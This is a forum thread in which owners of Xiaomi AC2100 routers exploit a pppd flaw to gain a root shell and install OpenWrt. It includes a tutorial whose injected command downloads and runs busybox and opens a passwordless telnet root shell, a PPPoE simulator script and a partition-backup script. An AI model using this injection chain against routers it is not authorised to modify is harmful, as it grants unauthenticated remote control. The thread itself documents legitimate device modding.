New Xiaomi router AC2100

Hello @patrickm

It might even work for AX3600 as the firmware version it has is 1.0.20

The pppd may be exploitable in the same way, but the script will not work: the AX3600 is ARM-based, not MIPS.

Thank you @namidairo for the exploit! :slightly_smiling_face: I tested it on the Redmi AC2100 with bootloader breed-mt7621-xiaomi-r3g.bin, and I can confirm it is working.


All firmware from the Xiaomi Mi3G is working; I tested Pandora, Padavan and OpenWrt, except for the 5GHz band and of course the missing USB.

Yeah... The only reason that would vaguely work is because of the similar flash layout.

Please don't flash mir3g images. It's likely one of your LAN ports isn't initialised, and your LED setup will be all wrong. (And the whole not having the 7615 working.)


I'd be pleasantly surprised if it did work on the R2100 as well, as I have hardcoded addresses for the ROP gadgets, sleep and the stack.

Hi. Where can I find proper images for it:
openwrt-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-kernel1.bin
openwrt-ramips-mt7621-xiaomi_redmi-router-ac2100-squashfs-rootfs0.bin

Because thorsten97's link
https://gofile.io/?c=LWjyIx is not working.

You still can download the 1.0.11 OFW.

Can you try to port it to the MiWiFi AX3600? For most WiFi 6 routers, having one shell is better than nothing.

To make the exploit a bit easier, I made a script simulating a PPPoE server. I tested it on Windows and Linux with the RM2100 router, and it was able to successfully set up the connection. I only tried the reboot exploit, and it successfully triggers it. If anyone could try it with the black cylinder and see if it works with the reverse shell, I would be thankful :grinning:
EDIT: If your router's MAC address doesn't start with 88:c3:97 (mine starts with 8c:53:c3), the exploit script might send the packet the wrong way. In that case you have to switch dst and src or hardcode your MAC address. @namidairo, any idea if this could be fixed?


It should be possible to get the router's MAC from the PADI packet.

To make it really easy, it would be nice to use only the WAN port, so I'm going to try to set up a working PPPoE connection for accessing the shell. But I have to figure out how to change the exploit payload first :P.

The PADI doesn't contain the necessary Session ID (it could be hardcoded in my script), and if the exploit triggers too early, it doesn't respond to the MD5 challenge.
Yeah, it would be great if it worked with the WAN port only. I'm currently helping someone with the setup and wrote a small tutorial on how to do it with WAN + Android phone^^ Since I've already written it, I'll attach it in case anyone is interested.

On Android:

  • Download "NetTools" and "Simple-HttpServer"
  • In NetTools, check Listen and enter 31337 for Port
  • In Simple-HttpServer, go to Settings and set the Document Root to "/storage/emulated/0/Download"
  • Use your browser to download busybox-mipsel from here: https://busybox.net/downloads/binaries/1.21.1/
  • Put this into your clipboard: wget http://192.168.31.177:12345/busybox-mipsel -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh
  • Change your WiFi to the Xiaomi one and edit your IP to 192.168.31.177
  • Go to 192.168.31.1 and make sure you set your Internet settings to PPPoE, automatic configuration, with user "a" and password "a"
  • In Simple-HttpServer, make sure it says http://192.168.31.177:12345/ at the top and switch the button to on
  • Go to NetTools and press Listen at the bottom

On PC:

  • Enter your interface name into both scripts
  • Replace "88:c3:97" in "src.startswith("88:c3:97")" with the first half of your router's MAC address
  • Start pppd-cve.py and PPPoE_Simulator.py
  • Restart pppd-cve.py until you get a Connected in NetTools

On Android:

  • Paste "wget http://192.168.31.177:12345/busybox-mipsel -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh" from your clipboard

On PC:

  • Connect your PC to one of the LAN ports
  • If everything worked, you can now use PuTTY to connect to telnet on 192.168.31.1 without a password

Hi Percy, great work! One question... Can I directly modify the MAC ID in the script?

    if src.startswith("88:c3:97") :
        src,dst = dst,src

change to

    if src.startswith("8c:53:c3") :
        src,dst = dst,src

You could remove this:

    dst = (packet['Ethernet'].dst)
    src = (packet['Ethernet'].src)
    # In case we pick up Router -> PPPoE server packet
    if src.startswith("88:c3:97") :
        src,dst = dst,src

and replace it with

    dst = "aa:bb:cc:aa:bb:cc" # Router mac
    src = "dd:ee:ff:dd:ee:ff" # Server mac
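The two points raised above, taking the router's MAC from the PADI instead of hardcoding a prefix, and supplying the Session ID that the PADI does not carry, can both be handled by the simulator itself. The following is an added example written for this page, not namidairo's or Percy's script; it parses and builds PPPoE discovery frames by hand (RFC 2516) so it runs without scapy or a network interface, and it goes slightly beyond the thread by covering the PADR → PADS step as well as PADI → PADO. The MAC addresses, the AC-Name "sim" and the session ID chosen in `pads_for_padr` are constructed placeholders; feeding in captured PADI bytes and sending the returned frames with a raw socket or scapy's `sendp()` is left to the surrounding script.

```python
"""PPPoE discovery helper: learn the router MAC from its PADI, answer with a
PADO, and assign the Session ID in the PADS. Added example, not thread code."""
import struct

ETHERTYPE_PPPOE_DISC = 0x8863
PPPOE_VER_TYPE = 0x11            # version 1, type 1
CODE_PADI, CODE_PADO, CODE_PADR, CODE_PADS = 0x09, 0x07, 0x19, 0x65
TAG_SERVICE_NAME, TAG_AC_NAME, TAG_HOST_UNIQ = 0x0101, 0x0102, 0x0103
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def bytes_to_mac(b):
    return ":".join("%02x" % x for x in b)


def parse_discovery(frame):
    """Parse Ethernet + PPPoE discovery header + TLV tags; None if not PPPoE."""
    if len(frame) < 20:
        return None
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_PPPOE_DISC:
        return None
    ver_type, code, session, length = struct.unpack("!BBHH", frame[14:20])
    if ver_type != PPPOE_VER_TYPE:
        return None
    payload = frame[20:20 + length]
    if len(payload) != length:
        return None              # truncated frame, do not trust it
    tags, off = {}, 0
    while off + 4 <= len(payload):
        ttype, tlen = struct.unpack("!HH", payload[off:off + 4])
        tags[ttype] = payload[off + 4:off + 4 + tlen]
        off += 4 + tlen
    return {"dst": bytes_to_mac(dst), "src": bytes_to_mac(src),
            "code": code, "session": session, "tags": tags}


def build_discovery(dst_mac, src_mac, code, session, tags):
    """Build a PPPoE discovery frame; tags is a list of (type, value) pairs."""
    payload = b"".join(struct.pack("!HH", t, len(v)) + v for t, v in tags)
    return (struct.pack("!6s6sH", mac_to_bytes(dst_mac), mac_to_bytes(src_mac),
                        ETHERTYPE_PPPOE_DISC)
            + struct.pack("!BBHH", PPPOE_VER_TYPE, code, session, len(payload))
            + payload)


def build_padi(router_mac, host_uniq=b""):
    """What the router broadcasts: Session ID 0, one Service-Name tag."""
    tags = [(TAG_SERVICE_NAME, b"")]
    if host_uniq:
        tags.append((TAG_HOST_UNIQ, host_uniq))
    return build_discovery(BROADCAST, router_mac, CODE_PADI, 0, tags)


def pado_for_padi(frame, server_mac, ac_name=b"sim"):
    """Return (router_mac, PADO frame) for a captured PADI, else None.
    The router MAC is simply the PADI's source address: no prefix needed."""
    p = parse_discovery(frame)
    if p is None or p["code"] != CODE_PADI:
        return None
    tags = [(TAG_SERVICE_NAME, p["tags"].get(TAG_SERVICE_NAME, b"")),
            (TAG_AC_NAME, ac_name)]
    if TAG_HOST_UNIQ in p["tags"]:     # echo Host-Uniq so the client matches
        tags.append((TAG_HOST_UNIQ, p["tags"][TAG_HOST_UNIQ]))
    return p["src"], build_discovery(p["src"], server_mac, CODE_PADO, 0, tags)


def pads_for_padr(frame, server_mac, session_id=0x1234):
    """Return the PADS for a PADR addressed to us; the server picks the
    non-zero Session ID here (0x1234 is an arbitrary placeholder)."""
    p = parse_discovery(frame)
    if p is None or p["code"] != CODE_PADR or p["dst"] != server_mac.lower():
        return None
    tags = [(TAG_SERVICE_NAME, p["tags"].get(TAG_SERVICE_NAME, b""))]
    if TAG_HOST_UNIQ in p["tags"]:
        tags.append((TAG_HOST_UNIQ, p["tags"][TAG_HOST_UNIQ]))
    return build_discovery(p["src"], server_mac, CODE_PADS, session_id, tags)


if __name__ == "__main__":
    # Constructed sample: a router with a non-88:c3:97 MAC sends a PADI.
    padi = build_padi("8c:53:c3:00:11:22", host_uniq=b"\x01\x02")
    router, pado = pado_for_padi(padi, "00:11:22:33:44:55")
    print("router MAC learned from PADI:", router)
    print("PADO:", parse_discovery(pado))
```

Once the PADS has gone out, the session ID it carries is the one the router will put in every PPP session frame (EtherType 0x8864), so the simulator should remember it rather than hardcode it.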

I got telnet to the device with the method written by @Percy. Many thanks to him. Before flashing firmware based on the Redmi AC2100, I want to back up all partitions of my Xiaomi AC2100. Maybe in the future I will need to get files from the original one. And @thorsten97 wants the original kernel; I want to help him too. Can somebody help me back up everything over telnet, or share a tutorial for me??

Thank you for your work. I have a Xiaomi AC2100 and I've encountered an error following your guide.
A telnet session can be successfully established; however, after pasting wget http://192.168.31.177:12345/busybox-mipsel -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh, the Netcat on Android kept saying that wget http://192.168.31.177:12345/busybox-mipsel -O not found. I'm pretty sure I have done everything right: the HTTP server was on, the bin file has been downloaded to Download ...
So what can I do to solve this problem? :sob: :sob: :sob:

It turns out that the directly copied URL http://192.168.31.177:12345 from "wget http://192.168.31.177:12345/busybox-mipsel -O /tmp/busybox && chmod a+x /tmp/busybox && /tmp/busybox telnetd -l /bin/sh" is wrong; the link should be copied from the Android browser in my case. ...
I confirm this exploit works on the cylinder AC2100!
Many thanks to namidairo and Percy!!!
You are awesome!!!

BTW,
the telnet port is 23

  1. After the dd backup, use tftp to transfer it to your computer.
  2. wget the openssh-server and openssh-sftp-server packages and install them, then transfer the files by sftp.

Can you help with which devices I need to back up? Or which path I need to dd?

Check the partition layout with:

cat /proc/mtd

In my case:

BusyBox v1.31.1 () built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt SNAPSHOT, r13060-471b8bf8c1
 -----------------------------------------------------
root@Belkin:~# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 00040000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00e20000 00010000 "rootfs"
mtd3: 00b60000 00010000 "rootfs_data"
mtd4: 00160000 00010000 "kernel"
mtd5: 00010000 00010000 "nvram"
mtd6: 00010000 00010000 "envram"
mtd7: 00010000 00010000 "art"
mtd8: 00f80000 00010000 "firmware"

To back up the firmware partition, mtd8, I would use:

dd if=/dev/mtd8 of=/tmp/firmware.backup.bin

This creates the backup .bin file in the /tmp directory.
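The two posts above give the procedure: read /proc/mtd, dd each partition to /tmp, then tftp it off the router. The script below is an added example written for this page, not a script from the thread: it turns /proc/mtd-style text into the dd, md5sum and tftp commands for every partition, one at a time so that /tmp (which is RAM on these routers) only ever holds a single image. The sample /proc/mtd text is constructed from the layout quoted above; the TFTP host 192.168.31.177 is an assumption (the phone/PC address used earlier in the thread) and must run a TFTP server that accepts uploads. On the stock firmware the `tftp` applet may have to come from the full busybox-mipsel binary fetched earlier, i.e. `/tmp/busybox tftp`.

```shell
#!/bin/sh
# Added example (not thread code): generate a per-partition MTD backup plan
# from /proc/mtd. Run on the router as:  mtd_backup_commands HOST < /proc/mtd | sh

# Constructed sample in /proc/mtd format (sizes are hex bytes).
SAMPLE_MTD='dev:    size   erasesize  name
mtd0: 00040000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00e20000 00010000 "rootfs"
mtd3: 00b60000 00010000 "rootfs_data"
mtd4: 00160000 00010000 "kernel"
mtd5: 00010000 00010000 "nvram"
mtd6: 00010000 00010000 "envram"
mtd7: 00010000 00010000 "art"
mtd8: 00f80000 00010000 "firmware"'

# mtd_partitions: read /proc/mtd-style text on stdin and print one line per
# partition:  <dev> <name> <size_bytes> <erasesize_bytes>
mtd_partitions() {
    while read -r dev size erase name; do
        case "$dev" in mtd[0-9]*) ;; *) continue ;; esac   # skip the header
        dev=${dev%:}
        name=${name#\"}
        name=${name%\"}
        echo "$dev $name $((0x$size)) $((0x$erase))"
    done
}

# mtd_backup_commands <tftp_host>: for each partition on stdin print the
# commands to dump it (bs = erase size), checksum it, upload it and free /tmp.
# tftp flags are busybox's: -p put, -l local file, -r remote file name.
mtd_backup_commands() {
    host=$1
    mtd_partitions | while read -r dev name size erase; do
        file="/tmp/$dev-$name.bin"
        echo "dd if=/dev/$dev of=$file bs=$erase"
        echo "md5sum $file"
        echo "tftp -p -l $file -r $dev-$name.bin $host"
        echo "rm $file"
    done
}

# Stand-alone demo on the constructed sample (prints the plan, runs nothing).
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_MTD" | mtd_backup_commands 192.168.31.177
fi
```

Keep the md5sum lines the router prints and compare them against the uploaded files on the PC; a partition that reads short (dd reporting fewer bytes than the size in /proc/mtd) or whose checksum differs should be dumped again before anything is flashed. Note that on this layout "firmware" spans "kernel" and "rootfs", so the full-flash images overlap the smaller ones; that is harmless for a backup.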

Thank you a lot. It really helped a lot. Can you help me with copying the backup images from the router? I cannot manage to start an sftp or ssh server. I just have telnet with the official firmware. I want to back up some partitions before flashing OpenWrt.